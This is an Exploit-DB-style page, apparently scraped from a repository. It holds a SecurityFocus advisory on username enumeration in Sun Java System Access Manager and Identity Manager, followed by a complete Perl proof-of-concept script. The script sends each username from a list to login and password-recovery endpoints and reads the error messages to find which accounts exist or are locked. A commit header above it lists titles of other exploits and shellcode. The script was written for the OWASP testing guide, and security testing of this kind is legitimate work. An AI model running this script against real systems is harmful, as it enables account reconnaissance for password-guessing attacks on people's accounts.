
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
178 lines
No EOL
6 KiB
Perl
Executable file
178 lines
No EOL
6 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/33489/info
|
|
|
|
Sun Java System Access Manager is prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input.
|
|
|
|
Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.
|
|
|
|
This issue affects the following versions:
|
|
|
|
Sun Java System Access Manager 6 2005Q1 (6.3)
|
|
Sun Java System Access Manager 7 2005Q4 (7.0)
|
|
Sun Java System Access Manager 7.1
|
|
|
|
Sun OpenSSO is also reported vulnerable.
|
|
|
|
#!/usr/bin/perl -w
|
|
# POC: Sun Java Access Manager and Identity Manager Users Enumeration
|
|
# Developed for OWASP Testing guide V3
|
|
# Simple script for Sun Java access manager and Identity Manager users enumeration
|
|
#
|
|
# Author : Marco Mella <marco.mella <at> aboutsecurity.net>
|
|
# Site : www.aboutsecurity.net
|
|
#
|
|
# © Copyright, 2008-2009 Marco Mella
|
|
# Sun Java System Access Manager and Sun Java System Identity Manager
|
|
# are trademarks or registered trademarks of Sun Microsystems, Inc.
|
|
#
|
|
# Last updated: 13 Jun 2008
|
|
#
|
|
use Getopt::Long;
|
|
use LWP::UserAgent;
|
|
use Switch;
|
|
$Userfile = "";
|
|
$line="";
|
|
|
|
|
|
my ($server, $user_file, $switch);
|
|
my $banner = "Author: Marco Mella <marco.mella <at> aboutsecurity.net>\n";
|
|
my $usage= "Usage:\n $0 -server <ip_address|host> -port <tcp port> -userfile <filename> -switch<am|idm> \n\n";
|
|
|
|
my $opt = GetOptions (
|
|
'server=s' => \$Server,
|
|
'port=s' => \$Port,
|
|
'userfile=s' => \$Userfile,
|
|
'switch=s' => \$Switch );
|
|
|
|
print "\n\n\n\n+-----------------------------------------------------------------------------------+\n\n";
|
|
print " Sun Java Access Manager and Identity Manager User Enumeration \n";
|
|
print " ".$banner."\n";
|
|
print "+-----------------------------------------------------------------------------------+\n\n";
|
|
|
|
|
|
if ( !$Server || !$Userfile ||!$Port || !$Switch) {
|
|
print $usage;
|
|
|
|
exit(1);
|
|
}
|
|
|
|
|
|
if ( $Switch eq "am" ) {
|
|
open(Userfile) or die("Could not open file: $Userfile\n\n");
|
|
print "Users enumeration Sun java System Access Manager\n\n ";
|
|
foreach $line (<Userfile>) {
|
|
my $url = 'https://'.$Server.':'.$Port.'/amserver/UI/Login?user='.$line;
|
|
my $browser = LWP::UserAgent->new;
|
|
|
|
my $response = $browser->get($url);
|
|
my @headers = $response->header_field_names;
|
|
#print "response headers: @headers\n";
|
|
|
|
$response->is_success or
|
|
die "Failed to GET '$url': ", $response->status_line, "\n Aborintg";
|
|
|
|
#print $response->as_string;
|
|
chomp($line);
|
|
|
|
# Analysis of response and title of web page received
|
|
if(($response->content =~ m{This user is not active} ) || ($response->title =~ m{User Inactive})) {
|
|
# print $response->content;
|
|
# print "\n\n\n\n";
|
|
# print $response->title;
|
|
print "\n\tUser: $line not valid\n\n"}
|
|
|
|
elsif (($response->content =~ m{No configuration found} ) || ($response->title =~ m{No Configuration Error})) {
|
|
print "\n\tUser: $line yeah ... Active user! \n\n"}
|
|
|
|
elsif ($response->content =~ m{Your account has been locked.} ) {
|
|
print "\n\tUser: $line Exist but Account has been locked\n\n"}
|
|
|
|
else {
|
|
print "\n\tUser: $line Active ???? Maybe you have to analizing the error message received \n\n"}
|
|
}
|
|
print "\n\n";
|
|
close(Userfile);
|
|
}
|
|
|
|
|
|
|
|
if ( $Switch eq "idm" ) {
|
|
open(Userfile) or die("Could not open file: $Userfile\n\n");
|
|
print "Users enumeration Sun java System Identity Manager - Login Feature Analysis\n\n ";
|
|
|
|
foreach $line (<Userfile>) {
|
|
my $url = 'https://'.$Server.':'.$Port.'/idm/login.jsp?id=&command=login&activeControl=&accountId='.$line.'&password=';
|
|
my $browser = LWP::UserAgent->new;
|
|
|
|
my $response = $browser->get($url);
|
|
my @headers = $response->header_field_names;
|
|
my $title = $response->title;
|
|
#print "response headers: @headers\n";
|
|
|
|
$response->is_success or
|
|
die "Failed to GET '$url': ", $response->status_line, "\n Aborintg";
|
|
|
|
#print $response->as_string;
|
|
chomp($line);
|
|
|
|
# Analysis of response and title of web page received
|
|
if($response->content =~ m{Invalid Account ID} ) {
|
|
# print $response->content;
|
|
# print "\n\n\n\n";
|
|
# print $response->title;
|
|
|
|
print "\n\tUser: $line not valid\n\n"}
|
|
|
|
elsif ($response->content =~ m{Invalid Password} ) {
|
|
print "\n\tUser: $line yeah ... Active user! \n\n"}
|
|
|
|
elsif ($response->content =~ m{Your account has been locked.} ) {
|
|
print "\n\tUser: $line Exist but Account has been locked\n\n"}
|
|
|
|
else {
|
|
print "\n\tUser: $line Active ???? Maybe you have to analizing the error message received \n\n"}
|
|
}
|
|
close(Userfile);
|
|
}
|
|
|
|
#IDM Recovery Feature
|
|
#https://oiawf02:8081/idm/questionLogin.jsp?accountId=owasp&lang=en&cntry=US
|
|
|
|
if ( $Switch eq "idm" ) {
|
|
open(Userfile) or die("Could not open file: $Userfile\n\n");
|
|
print "\n\n\n\nUsers enumeration Sun java System Identity Manager - Recovery Feature Analysis\n\n ";
|
|
|
|
foreach $line (<Userfile>) {
|
|
my $url = 'https://'.$Server.':'.$Port.'/idm/questionLogin.jsp?accountId='.$line;
|
|
my $browser = LWP::UserAgent->new;
|
|
|
|
my $response = $browser->get($url);
|
|
my @headers = $response->header_field_names;
|
|
my $title = $response->title;
|
|
#print "response headers: @headers\n";
|
|
|
|
$response->is_success or
|
|
die "Failed to GET '$url': ", $response->status_line, "\n Aborintg";
|
|
|
|
#print $response->as_string;
|
|
chomp($line);
|
|
|
|
# Analysis of response and title of web page received
|
|
if($response->content =~ m{The specified user was not found} ) {
|
|
# print $response->content;
|
|
# print "\n\n\n\n";
|
|
# print $response->title;
|
|
|
|
print "\n\tUser: $line not valid\n\n"}
|
|
|
|
elsif ($response->content =~ m{Too few user} ) {
|
|
print "\n\tUser: $line yeah ... Active user! \n\n"}
|
|
|
|
elsif ($response->content =~ m{Your account has been locked.} ) {
|
|
print "\n\tUser: $line Exist but Account has been locked\n\n"}
|
|
|
|
else {
|
|
print "\n\tUser: $line Active ???? Maybe you have to analizing the error message received \n\n"}
|
|
}
|
|
print "\n\n";
|
|
close(Userfile);
|
|
} |